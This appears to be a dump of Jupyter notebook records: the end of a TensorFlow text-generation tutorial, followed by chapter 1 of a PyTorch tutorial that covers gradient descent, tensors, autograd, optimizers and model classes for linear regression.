"The easiest thing you can do to improve the results is to train it for longer (try `EPOCHS = 30`).\n\nYou can also experiment with a different start string, try adding another RNN layer to improve the model's accuracy, or adjust the temperature parameter to generate more or less random predictions.",
"_____no_output_____"
],
[
"If you want the model to generate text *faster* the easiest thing you can do is batch the text generation. In the example below the model generates 5 outputs in about the same time it took to generate 1 above. ",
"_____no_output_____"
]
],
[
[
"start = time.time()\nstates = None\nnext_char = tf.constant(['ROMEO:', 'ROMEO:', 'ROMEO:', 'ROMEO:', 'ROMEO:'])\nresult = [next_char]\n\nfor n in range(1000):\n next_char, states = one_step_model.generate_one_step(next_char, states=states)\n result.append(next_char)\n\nresult = tf.strings.join(result)\nend = time.time()\n\nprint(result, '\\n\\n' + '_'*80)\n\n\nprint(f\"\\nRun time: {end - start}\")",
"_____no_output_____"
]
],
[
[
"## Export the generator\n\nThis single-step model can easily be [saved and restored](https://www.tensorflow.org/guide/saved_model), allowing you to use it anywhere a `tf.saved_model` is accepted.",
"_____no_output_____"
]
],
[
[
"tf.saved_model.save(one_step_model, 'one_step')\none_step_reloaded = tf.saved_model.load('one_step')",
"_____no_output_____"
],
[
"states = None\nnext_char = tf.constant(['ROMEO:'])\nresult = [next_char]\n\nfor n in range(100):\n next_char, states = one_step_reloaded.generate_one_step(next_char, states=states)\n result.append(next_char)\n\nprint(tf.strings.join(result)[0].numpy().decode(\"utf-8\"))",
"_____no_output_____"
]
],
[
[
"## Advanced: Customized Training\n\nThe above training procedure is simple, but does not give you much control.\nIt uses teacher-forcing which prevents bad predictions from being fed back to the model so the model never learns to recover from mistakes.\n\nSo now that you've seen how to run the model manually next you'll implement the training loop. This gives a starting point if, for example, you want to implement _curriculum learning_ to help stabilize the model's open-loop output.\n\nThe most important part of a custom training loop is the train step function.\n\nUse `tf.GradientTape` to track the gradients. You can learn more about this approach by reading the [eager execution guide](https://www.tensorflow.org/guide/eager).\n\nThe basic procedure is:\n\n1. Execute the model and calculate the loss under a `tf.GradientTape`.\n2. Calculate the updates and apply them to the model using the optimizer.",
"_____no_output_____"
]
],
[
[
"class CustomTraining(MyModel):\n @tf.function\n def train_step(self, inputs):\n inputs, labels = inputs\n with tf.GradientTape() as tape:\n predictions = self(inputs, training=True)\n loss = self.loss(labels, predictions)\n grads = tape.gradient(loss, model.trainable_variables)\n self.optimizer.apply_gradients(zip(grads, model.trainable_variables))\n\n return {'loss': loss}",
"_____no_output_____"
]
],
[
[
"The above implementation of the `train_step` method follows [Keras' `train_step` conventions](https://www.tensorflow.org/guide/keras/customizing_what_happens_in_fit). This is optional, but it allows you to change the behavior of the train step and still use keras' `Model.compile` and `Model.fit` methods.",
"_____no_output_____"
]
],
[
[
"model = CustomTraining(\n vocab_size=len(ids_from_chars.get_vocabulary()),\n embedding_dim=embedding_dim,\n rnn_units=rnn_units)",
"_____no_output_____"
],
[
"model.compile(optimizer = tf.keras.optimizers.Adam(),\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True))",
"_____no_output_____"
],
[
"model.fit(dataset, epochs=1)",
"_____no_output_____"
]
],
[
[
"Or if you need more control, you can write your own complete custom training loop:",
"_____no_output_____"
]
],
[
[
"EPOCHS = 10\n\nmean = tf.metrics.Mean()\n\nfor epoch in range(EPOCHS):\n start = time.time()\n\n mean.reset_states()\n for (batch_n, (inp, target)) in enumerate(dataset):\n logs = model.train_step([inp, target])\n mean.update_state(logs['loss'])\n\n if batch_n % 50 == 0:\n template = 'Epoch {} Batch {} Loss {}'\n print(template.format(epoch + 1, batch_n, logs['loss']))\n\n # saving (checkpoint) the model every 5 epochs\n if (epoch + 1) % 5 == 0:\n model.save_weights(checkpoint_prefix.format(epoch=epoch))\n\n print()\n print('Epoch {} Loss: {:.4f}'.format(epoch + 1, mean.result().numpy()))\n print('Time taken for 1 epoch {} sec'.format(time.time() - start))\n print(\"_\"*80)\n\nmodel.save_weights(checkpoint_prefix.format(epoch=epoch))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2a471d5b467deea82da8954e6c89d87c9c28dc | 130,824 | ipynb | Jupyter Notebook | Chapter01.ipynb | ridhimagarg/PyTorchStepByStep | 7b8b5b10834cd6b4afe47a5a5495dc07c490ca34 | [
"MIT"
] | 1 | 2022-03-10T09:12:58.000Z | 2022-03-10T09:12:58.000Z | Chapter01.ipynb | ridhimagarg/PyTorchStepByStep | 7b8b5b10834cd6b4afe47a5a5495dc07c490ca34 | [
"MIT"
] | null | null | null | Chapter01.ipynb | ridhimagarg/PyTorchStepByStep | 7b8b5b10834cd6b4afe47a5a5495dc07c490ca34 | [
"MIT"
] | null | null | null | 53.310513 | 32,336 | 0.723132 | [
[
[
"# Deep Learning with PyTorch Step-by-Step: A Beginner's Guide",
"_____no_output_____"
],
[
"# Chapter 1",
"_____no_output_____"
]
],
[
[
"try:\n import google.colab\n import requests\n url = 'https://raw.githubusercontent.com/dvgodoy/PyTorchStepByStep/master/config.py'\n r = requests.get(url, allow_redirects=True)\n open('config.py', 'wb').write(r.content) \nexcept ModuleNotFoundError:\n pass\n\nfrom config import *\nconfig_chapter1()\n# This is needed to render the plots in this chapter\nfrom plots.chapter1 import *",
"_____no_output_____"
],
[
"import numpy as np\nfrom sklearn.linear_model import LinearRegression\n\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nfrom torchviz import make_dot",
"_____no_output_____"
]
],
[
[
"# A Simple Regression Problem\n\n$$\n\\Large y = b + w x + \\epsilon\n$$",
"_____no_output_____"
],
[
"## Data Generation",
"_____no_output_____"
],
[
"### Synthetic Data Generation",
"_____no_output_____"
]
],
[
[
"true_b = 1\ntrue_w = 2\nN = 100\n\n# Data Generation\nnp.random.seed(42)\nx = np.random.rand(N, 1)\nepsilon = (.1 * np.random.randn(N, 1))\ny = true_b + true_w * x + epsilon",
"_____no_output_____"
]
],
[
[
"### Cell 1.1",
"_____no_output_____"
]
],
[
[
"# Shuffles the indices\nidx = np.arange(N)\nnp.random.shuffle(idx)\n\n# Uses first 80 random indices for train\ntrain_idx = idx[:int(N*.8)]\n# Uses the remaining indices for validation\nval_idx = idx[int(N*.8):]\n\n# Generates train and validation sets\nx_train, y_train = x[train_idx], y[train_idx]\nx_val, y_val = x[val_idx], y[val_idx]",
"_____no_output_____"
],
[
"figure1(x_train, y_train, x_val, y_val)",
"_____no_output_____"
]
],
[
[
"# Gradient Descent",
"_____no_output_____"
],
[
"## Step 0: Random Initialization",
"_____no_output_____"
]
],
[
[
"# Step 0 - Initializes parameters \"b\" and \"w\" randomly\nnp.random.seed(42)\nb = np.random.randn(1)\nw = np.random.randn(1)\n\nprint(b, w)",
"[0.49671415] [-0.1382643]\n"
]
],
[
[
"## Step 1: Compute Model's Predictions",
"_____no_output_____"
]
],
[
[
"# Step 1 - Computes our model's predicted output - forward pass\nyhat = b + w * x_train",
"_____no_output_____"
]
],
[
[
"## Step 2: Compute the Loss",
"_____no_output_____"
]
],
[
[
"# Step 2 - Computing the loss\n# We are using ALL data points, so this is BATCH gradient\n# descent. How wrong is our model? That's the error!\nerror = (yhat - y_train)\n\n# It is a regression, so it computes mean squared error (MSE)\nloss = (error ** 2).mean()\n\nprint(loss)",
"2.7421577700550976\n"
]
],
[
[
"## Step 3: Compute the Gradients",
"_____no_output_____"
]
],
[
[
"# Step 3 - Computes gradients for both \"b\" and \"w\" parameters\nb_grad = 2 * error.mean()\nw_grad = 2 * (x_train * error).mean()\nprint(b_grad, w_grad)",
"-3.044811379650508 -1.8337537171510832\n"
]
],
[
[
"## Step 4: Update the Parameters",
"_____no_output_____"
]
],
[
[
"# Sets learning rate - this is \"eta\" ~ the \"n\" like Greek letter\nlr = 0.1\nprint(b, w)\n\n# Step 4 - Updates parameters using gradients and \n# the learning rate\nb = b - lr * b_grad\nw = w - lr * w_grad\n\nprint(b, w)",
"[0.49671415] [-0.1382643]\n[0.80119529] [0.04511107]\n"
]
],
[
[
"## Step 5: Rinse and Repeat!",
"_____no_output_____"
]
],
[
[
"# Go back to Step 1 and rerun it to observe how your parameters b and w change",
"_____no_output_____"
]
],
[
[
"# Linear Regression in Numpy",
"_____no_output_____"
],
[
"### Cell 1.2",
"_____no_output_____"
]
],
[
[
"# Step 0 - Initializes parameters \"b\" and \"w\" randomly\nnp.random.seed(42)\nb = np.random.randn(1)\nw = np.random.randn(1)\n\nprint(b, w)\n\n# Sets learning rate - this is \"eta\" ~ the \"n\"-like Greek letter\nlr = 0.1\n# Defines number of epochs\nn_epochs = 1000\n\nfor epoch in range(n_epochs):\n # Step 1 - Computes model's predicted output - forward pass\n yhat = b + w * x_train\n \n # Step 2 - Computes the loss\n # We are using ALL data points, so this is BATCH gradient\n # descent. How wrong is our model? That's the error! \n error = (yhat - y_train)\n # It is a regression, so it computes mean squared error (MSE)\n loss = (error ** 2).mean()\n \n # Step 3 - Computes gradients for both \"b\" and \"w\" parameters\n b_grad = 2 * error.mean()\n w_grad = 2 * (x_train * error).mean()\n \n # Step 4 - Updates parameters using gradients and \n # the learning rate\n b = b - lr * b_grad\n w = w - lr * w_grad\n \nprint(b, w)",
"[0.49671415] [-0.1382643]\n[1.02354094] [1.96896411]\n"
],
[
"# Sanity Check: do we get the same results as our\n# gradient descent?\nlinr = LinearRegression()\nlinr.fit(x_train, y_train)\nprint(linr.intercept_, linr.coef_[0])",
"[1.02354075] [1.96896447]\n"
],
[
"fig = figure3(x_train, y_train)",
"_____no_output_____"
]
],
[
[
"# PyTorch",
"_____no_output_____"
],
[
"## Tensor",
"_____no_output_____"
]
],
[
[
"scalar = torch.tensor(3.14159)\nvector = torch.tensor([1, 2, 3])\nmatrix = torch.ones((2, 3), dtype=torch.float)\ntensor = torch.randn((2, 3, 4), dtype=torch.float)\n\nprint(scalar)\nprint(vector)\nprint(matrix)\nprint(tensor)",
"tensor(3.1416)\ntensor([1, 2, 3])\ntensor([[1., 1., 1.],\n [1., 1., 1.]])\ntensor([[[ 1.2189, -0.7499, 1.1768, 0.1267],\n [ 1.1126, -1.0030, -0.5765, -0.2187],\n [-0.3212, 0.7264, 1.3247, 0.7378]],\n\n [[-0.4538, 1.2395, -1.8186, -0.2005],\n [ 0.0404, -0.4431, 2.4759, 0.9298],\n [ 0.8922, 1.6280, -0.8904, 1.8739]]])\n"
],
[
"print(tensor.size(), tensor.shape)",
"torch.Size([2, 3, 4]) torch.Size([2, 3, 4])\n"
],
[
"print(scalar.size(), scalar.shape)",
"torch.Size([]) torch.Size([])\n"
],
[
"# We get a tensor with a different shape but it still is\n# the SAME tensor\nsame_matrix = matrix.view(1, 6)\n# If we change one of its elements...\nsame_matrix[0, 1] = 2.\n# It changes both variables: matrix and same_matrix\nprint(matrix)\nprint(same_matrix)",
"tensor([[1., 2., 1.],\n [1., 1., 1.]])\ntensor([[1., 2., 1., 1., 1., 1.]])\n"
],
[
"# We can use \"new_tensor\" method to REALLY copy it into a new one\ndifferent_matrix = matrix.new_tensor(matrix.view(1, 6))\n# Now, if we change one of its elements...\ndifferent_matrix[0, 1] = 3.\n# The original tensor (matrix) is left untouched!\n# But we get a \"warning\" from PyTorch telling us \n# to use \"clone()\" instead!\nprint(matrix)\nprint(different_matrix)",
"tensor([[1., 2., 1.],\n [1., 1., 1.]])\ntensor([[1., 3., 1., 1., 1., 1.]])\n"
],
[
"# Lets follow PyTorch's suggestion and use \"clone\" method\nanother_matrix = matrix.view(1, 6).clone().detach()\n# Again, if we change one of its elements...\nanother_matrix[0, 1] = 4.\n# The original tensor (matrix) is left untouched!\nprint(matrix)\nprint(another_matrix)",
"tensor([[1., 2., 1.],\n [1., 1., 1.]])\ntensor([[1., 4., 1., 1., 1., 1.]])\n"
]
],
[
[
"## Loading Data, Devices and CUDA",
"_____no_output_____"
]
],
[
[
"x_train_tensor = torch.as_tensor(x_train)\nx_train.dtype, x_train_tensor.dtype",
"_____no_output_____"
],
[
"float_tensor = x_train_tensor.float()\nfloat_tensor.dtype",
"_____no_output_____"
],
[
"dummy_array = np.array([1, 2, 3])\ndummy_tensor = torch.as_tensor(dummy_array)\n# Modifies the numpy array\ndummy_array[1] = 0\n# Tensor gets modified too...\ndummy_tensor",
"_____no_output_____"
],
[
"dummy_tensor.numpy()",
"_____no_output_____"
]
],
[
[
"### Defining your device",
"_____no_output_____"
]
],
[
[
"device = 'cuda' if torch.cuda.is_available() else 'cpu'",
"_____no_output_____"
],
[
"n_cudas = torch.cuda.device_count()\nfor i in range(n_cudas):\n print(torch.cuda.get_device_name(i))",
"_____no_output_____"
],
[
"gpu_tensor = torch.as_tensor(x_train).to(device)\ngpu_tensor[0]",
"_____no_output_____"
]
],
[
[
"### Cell 1.3",
"_____no_output_____"
]
],
[
[
"device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n# Our data was in Numpy arrays, but we need to transform them \n# into PyTorch's Tensors and then we send them to the \n# chosen device\nx_train_tensor = torch.as_tensor(x_train).float().to(device)\ny_train_tensor = torch.as_tensor(y_train).float().to(device)",
"_____no_output_____"
],
[
"# Here we can see the difference - notice that .type() is more\n# useful since it also tells us WHERE the tensor is (device)\nprint(type(x_train), type(x_train_tensor), x_train_tensor.type())",
"<class 'numpy.ndarray'> <class 'torch.Tensor'> torch.FloatTensor\n"
],
[
"back_to_numpy = x_train_tensor.numpy()",
"_____no_output_____"
],
[
"back_to_numpy = x_train_tensor.cpu().numpy()",
"_____no_output_____"
]
],
[
[
"## Creating Parameters",
"_____no_output_____"
]
],
[
[
"# FIRST\n# Initializes parameters \"b\" and \"w\" randomly, ALMOST as we\n# did in Numpy since we want to apply gradient descent on\n# these parameters we need to set REQUIRES_GRAD = TRUE\ntorch.manual_seed(42)\nb = torch.randn(1, requires_grad=True, dtype=torch.float)\nw = torch.randn(1, requires_grad=True, dtype=torch.float)\nprint(b, w)",
"tensor([0.3367], requires_grad=True) tensor([0.1288], requires_grad=True)\n"
],
[
"# SECOND\n# But what if we want to run it on a GPU? We could just\n# send them to device, right?\ntorch.manual_seed(42)\nb = torch.randn(1, requires_grad=True, dtype=torch.float).to(device)\nw = torch.randn(1, requires_grad=True, dtype=torch.float).to(device)\nprint(b, w)\n# Sorry, but NO! The to(device) \"shadows\" the gradient...",
"tensor([0.3367], requires_grad=True) tensor([0.1288], requires_grad=True)\n"
],
[
"# THIRD\n# We can either create regular tensors and send them to\n# the device (as we did with our data)\ntorch.manual_seed(42)\nb = torch.randn(1, dtype=torch.float).to(device)\nw = torch.randn(1, dtype=torch.float).to(device)\n# and THEN set them as requiring gradients...\nb.requires_grad_()\nw.requires_grad_()\nprint(b, w)",
"tensor([0.3367], requires_grad=True) tensor([0.1288], requires_grad=True)\n"
]
],
[
[
"### Cell 1.4",
"_____no_output_____"
]
],
[
[
"# FINAL\n# We can specify the device at the moment of creation\n# RECOMMENDED!\n\n# Step 0 - Initializes parameters \"b\" and \"w\" randomly\ntorch.manual_seed(42)\nb = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\nw = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\nprint(b, w)",
"tensor([0.3367], requires_grad=True) tensor([0.1288], requires_grad=True)\n"
]
],
[
[
"# Autograd",
"_____no_output_____"
],
[
"## backward",
"_____no_output_____"
],
[
"### Cell 1.5",
"_____no_output_____"
]
],
[
[
"# Step 1 - Computes our model's predicted output - forward pass\nyhat = b + w * x_train_tensor\n\n# Step 2 - Computes the loss\n# We are using ALL data points, so this is BATCH gradient descent\n# How wrong is our model? That's the error! \nerror = (yhat - y_train_tensor)\n# It is a regression, so it computes mean squared error (MSE)\nloss = (error ** 2).mean()\n\n# Step 3 - Computes gradients for both \"b\" and \"w\" parameters\n# No more manual computation of gradients! \n# b_grad = 2 * error.mean()\n# w_grad = 2 * (x_tensor * error).mean()\nloss.backward()",
"_____no_output_____"
],
[
"print(error.requires_grad, yhat.requires_grad, \\\n b.requires_grad, w.requires_grad)\nprint(y_train_tensor.requires_grad, x_train_tensor.requires_grad)",
"True True True True\nFalse False\n"
]
],
[
[
"## grad",
"_____no_output_____"
]
],
[
[
"print(b.grad, w.grad)",
"tensor([-3.1125]) tensor([-1.8156])\n"
],
[
"# Just run the two cells above one more time ",
"_____no_output_____"
]
],
[
[
"## zero_",
"_____no_output_____"
]
],
[
[
"# This code will be placed *after* Step 4\n# (updating the parameters)\nb.grad.zero_(), w.grad.zero_()",
"_____no_output_____"
]
],
[
[
"## Updating Parameters",
"_____no_output_____"
],
[
"### Cell 1.6",
"_____no_output_____"
]
],
[
[
"# Sets learning rate - this is \"eta\" ~ the \"n\"-like Greek letter\nlr = 0.1\n\n# Step 0 - Initializes parameters \"b\" and \"w\" randomly\ntorch.manual_seed(42)\nb = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\nw = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\n\n# Defines number of epochs\nn_epochs = 1000\n\nfor epoch in range(n_epochs):\n # Step 1 - Computes model's predicted output - forward pass\n yhat = b + w * x_train_tensor\n \n # Step 2 - Computes the loss\n # We are using ALL data points, so this is BATCH gradient\n # descent. How wrong is our model? That's the error!\n error = (yhat - y_train_tensor)\n # It is a regression, so it computes mean squared error (MSE)\n loss = (error ** 2).mean()\n\n # Step 3 - Computes gradients for both \"b\" and \"w\" parameters\n # No more manual computation of gradients! \n # b_grad = 2 * error.mean()\n # w_grad = 2 * (x_tensor * error).mean() \n # We just tell PyTorch to work its way BACKWARDS \n # from the specified loss!\n loss.backward()\n \n # Step 4 - Updates parameters using gradients and \n # the learning rate. But not so fast...\n # FIRST ATTEMPT - just using the same code as before\n # AttributeError: 'NoneType' object has no attribute 'zero_'\n # b = b - lr * b.grad\n # w = w - lr * w.grad\n # print(b)\n\n # SECOND ATTEMPT - using in-place Python assigment\n # RuntimeError: a leaf Variable that requires grad\n # has been used in an in-place operation.\n # b -= lr * b.grad\n # w -= lr * w.grad \n \n # THIRD ATTEMPT - NO_GRAD for the win!\n # We need to use NO_GRAD to keep the update out of\n # the gradient computation. Why is that? It boils \n # down to the DYNAMIC GRAPH that PyTorch uses...\n with torch.no_grad():\n b -= lr * b.grad\n w -= lr * w.grad\n \n # PyTorch is \"clingy\" to its computed gradients, we\n # need to tell it to let it go...\n b.grad.zero_()\n w.grad.zero_()\n \nprint(b, w)",
"tensor([1.0235], requires_grad=True) tensor([1.9690], requires_grad=True)\n"
]
],
[
[
"## no_grad",
"_____no_output_____"
]
],
[
[
"# This is what we used in the THIRD ATTEMPT...",
"_____no_output_____"
]
],
[
[
"# Dynamic Computation Graph",
"_____no_output_____"
]
],
[
[
"# Step 0 - Initializes parameters \"b\" and \"w\" randomly\ntorch.manual_seed(42)\nb = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\nw = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\n\n# Step 1 - Computes our model's predicted output - forward pass\nyhat = b + w * x_train_tensor\n\n# Step 2 - Computes the loss\n# We are using ALL data points, so this is BATCH gradient\n# descent. How wrong is our model? That's the error! \nerror = (yhat - y_train_tensor)\n# It is a regression, so it computes mean squared error (MSE)\nloss = (error ** 2).mean()\n\n# We can try plotting the graph for any python variable: \n# yhat, error, loss...\nmake_dot(yhat)",
"_____no_output_____"
],
[
"b_nograd = torch.randn(1, requires_grad=False, \\\n dtype=torch.float, device=device)\nw = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\n\nyhat = b_nograd + w * x_train_tensor\n\nmake_dot(yhat)",
"_____no_output_____"
],
[
"b = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\nw = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\n\nyhat = b + w * x_train_tensor\nerror = yhat - y_train_tensor\nloss = (error ** 2).mean()\n\n# this makes no sense!!\nif loss > 0:\n yhat2 = w * x_train_tensor\n error2 = yhat2 - y_train_tensor\n \n# neither does this :-)\nloss += error2.mean()\n\nmake_dot(loss)",
"_____no_output_____"
]
],
[
[
"# Optimizer",
"_____no_output_____"
],
[
"## step / zero_grad",
"_____no_output_____"
]
],
[
[
"# Defines a SGD optimizer to update the parameters\noptimizer = optim.SGD([b, w], lr=lr)",
"_____no_output_____"
]
],
[
[
"### Cell 1.7",
"_____no_output_____"
]
],
[
[
"# Sets learning rate - this is \"eta\" ~ the \"n\"-like Greek letter\nlr = 0.1\n\n# Step 0 - Initializes parameters \"b\" and \"w\" randomly\ntorch.manual_seed(42)\nb = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\nw = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\n\n# Defines a SGD optimizer to update the parameters\noptimizer = optim.SGD([b, w], lr=lr)\n\n# Defines number of epochs\nn_epochs = 1000\n\nfor epoch in range(n_epochs):\n # Step 1 - Computes model's predicted output - forward pass\n yhat = b + w * x_train_tensor\n \n # Step 2 - Computes the loss\n # We are using ALL data points, so this is BATCH gradient \n # descent. How wrong is our model? That's the error! \n error = (yhat - y_train_tensor)\n # It is a regression, so it computes mean squared error (MSE)\n loss = (error ** 2).mean()\n\n # Step 3 - Computes gradients for both \"b\" and \"w\" parameters\n loss.backward()\n \n # Step 4 - Updates parameters using gradients and \n # the learning rate. No more manual update!\n # with torch.no_grad():\n # b -= lr * b.grad\n # w -= lr * w.grad\n optimizer.step()\n \n # No more telling Pytorch to let gradients go!\n # b.grad.zero_()\n # w.grad.zero_()\n optimizer.zero_grad()\n \nprint(b, w)",
"tensor([1.0235], requires_grad=True) tensor([1.9690], requires_grad=True)\n"
]
],
[
[
"# Loss",
"_____no_output_____"
]
],
[
[
"# Defines a MSE loss function\nloss_fn = nn.MSELoss(reduction='mean')\nloss_fn",
"_____no_output_____"
],
[
"# This is a random example to illustrate the loss function\npredictions = torch.tensor([0.5, 1.0])\nlabels = torch.tensor([2.0, 1.3])\nloss_fn(predictions, labels)",
"_____no_output_____"
]
],
[
[
"### Cell 1.8",
"_____no_output_____"
]
],
[
[
"# Sets learning rate - this is \"eta\" ~ the \"n\"-like\n# Greek letter\nlr = 0.1\n\n# Step 0 - Initializes parameters \"b\" and \"w\" randomly\ntorch.manual_seed(42)\nb = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\nw = torch.randn(1, requires_grad=True, \\\n dtype=torch.float, device=device)\n\n# Defines a SGD optimizer to update the parameters\noptimizer = optim.SGD([b, w], lr=lr)\n\n# Defines a MSE loss function\nloss_fn = nn.MSELoss(reduction='mean')\n\n# Defines number of epochs\nn_epochs = 1000\n\nfor epoch in range(n_epochs):\n # Step 1 - Computes model's predicted output - forward pass\n yhat = b + w * x_train_tensor\n \n # Step 2 - Computes the loss\n # No more manual loss!\n # error = (yhat - y_train_tensor)\n # loss = (error ** 2).mean()\n loss = loss_fn(yhat, y_train_tensor)\n\n # Step 3 - Computes gradients for both \"b\" and \"w\" parameters\n loss.backward()\n \n # Step 4 - Updates parameters using gradients and\n # the learning rate\n optimizer.step()\n optimizer.zero_grad()\n \nprint(b, w)",
"tensor([1.0235], requires_grad=True) tensor([1.9690], requires_grad=True)\n"
],
[
"loss",
"_____no_output_____"
],
[
"loss.cpu().numpy()",
"_____no_output_____"
],
[
"loss.detach().cpu().numpy()",
"_____no_output_____"
],
[
"print(loss.item(), loss.tolist())",
"0.008044655434787273 0.008044655434787273\n"
]
],
[
[
"# Model",
"_____no_output_____"
],
[
"### Cell 1.9",
"_____no_output_____"
]
],
[
[
"class ManualLinearRegression(nn.Module):\n def __init__(self):\n super().__init__()\n # To make \"b\" and \"w\" real parameters of the model,\n # we need to wrap them with nn.Parameter\n self.b = nn.Parameter(torch.randn(1,\n requires_grad=True, \n dtype=torch.float))\n self.w = nn.Parameter(torch.randn(1, \n requires_grad=True,\n dtype=torch.float))\n \n def forward(self, x):\n # Computes the outputs / predictions\n return self.b + self.w * x",
"_____no_output_____"
]
],
[
[
"## Parameters",
"_____no_output_____"
]
],
[
[
"torch.manual_seed(42)\n# Creates a \"dummy\" instance of our ManualLinearRegression model\ndummy = ManualLinearRegression()\nlist(dummy.parameters())",
"_____no_output_____"
]
],
[
[
"## state_dict",
"_____no_output_____"
]
],
[
[
"dummy.state_dict()",
"_____no_output_____"
],
[
"optimizer.state_dict()",
"_____no_output_____"
]
],
[
[
"## device",
"_____no_output_____"
]
],
[
[
"torch.manual_seed(42)\n# Creates a \"dummy\" instance of our ManualLinearRegression model\n# and sends it to the device\ndummy = ManualLinearRegression().to(device)",
"_____no_output_____"
]
],
[
[
"## Forward Pass",
"_____no_output_____"
],
[
"### Cell 1.10",
"_____no_output_____"
]
],
[
[
"# Sets learning rate - this is \"eta\" ~ the \"n\"-like\n# Greek letter\nlr = 0.1\n\n# Step 0 - Initializes parameters \"b\" and \"w\" randomly\ntorch.manual_seed(42)\n# Now we can create a model and send it at once to the device\nmodel = ManualLinearRegression().to(device)\n\n# Defines a SGD optimizer to update the parameters \n# (now retrieved directly from the model)\noptimizer = optim.SGD(model.parameters(), lr=lr)\n\n# Defines a MSE loss function\nloss_fn = nn.MSELoss(reduction='mean')\n\n# Defines number of epochs\nn_epochs = 1000\n\nfor epoch in range(n_epochs):\n model.train() # What is this?!?\n\n # Step 1 - Computes model's predicted output - forward pass\n # No more manual prediction!\n yhat = model(x_train_tensor)\n \n # Step 2 - Computes the loss\n loss = loss_fn(yhat, y_train_tensor)\n\n # Step 3 - Computes gradients for both \"b\" and \"w\" parameters\n loss.backward()\n \n # Step 4 - Updates parameters using gradients and\n # the learning rate\n optimizer.step()\n optimizer.zero_grad()\n \n# We can also inspect its parameters using its state_dict\nprint(model.state_dict())",
"OrderedDict([('b', tensor([1.0235])), ('w', tensor([1.9690]))])\n"
]
],
[
[
"## train",
"_____no_output_____"
]
],
[
[
"## Never forget to include model.train() in your training loop!",
"_____no_output_____"
]
],
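[
[
"# (added sketch, not part of the original notebook)\n# train() / eval() switch the behavior of layers like Dropout and\n# BatchNorm; our simple model has neither, but the calls are cheap\n# and forgetting them is a classic source of bugs\nmodel.eval()                 # evaluation mode for making predictions\nwith torch.no_grad():\n    sample_preds = model(x_train_tensor[:3])\nprint(sample_preds)\nmodel.train()                # back to training mode\nprint(model.training)        # True",
"_____no_output_____"
]
],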
[
[
"## Nested Models",
"_____no_output_____"
]
],
[
[
"linear = nn.Linear(1, 1)\nlinear",
"_____no_output_____"
],
[
"linear.state_dict()",
"_____no_output_____"
]
],
[
[
"### Cell 1.11",
"_____no_output_____"
]
],
[
[
"class MyLinearRegression(nn.Module):\n def __init__(self):\n super().__init__()\n # Instead of our custom parameters, we use a Linear model\n # with single input and single output\n self.linear = nn.Linear(1, 1)\n \n def forward(self, x):\n # Now it only takes a call\n self.linear(x)",
"_____no_output_____"
],
[
"torch.manual_seed(42)\ndummy = MyLinearRegression().to(device)\nlist(dummy.parameters())",
"_____no_output_____"
],
[
"dummy.state_dict()",
"_____no_output_____"
]
],
[
[
"## Sequential Models",
"_____no_output_____"
],
[
"### Cell 1.12",
"_____no_output_____"
]
],
[
[
"torch.manual_seed(42)\n# Alternatively, you can use a Sequential model\nmodel = nn.Sequential(nn.Linear(1, 1)).to(device)\n\nmodel.state_dict()",
"_____no_output_____"
]
],
[
[
"## Layers",
"_____no_output_____"
]
],
[
[
"torch.manual_seed(42)\n# Building the model from the figure above\nmodel = nn.Sequential(nn.Linear(3, 5), nn.Linear(5, 1)).to(device)\n\nmodel.state_dict()",
"_____no_output_____"
],
[
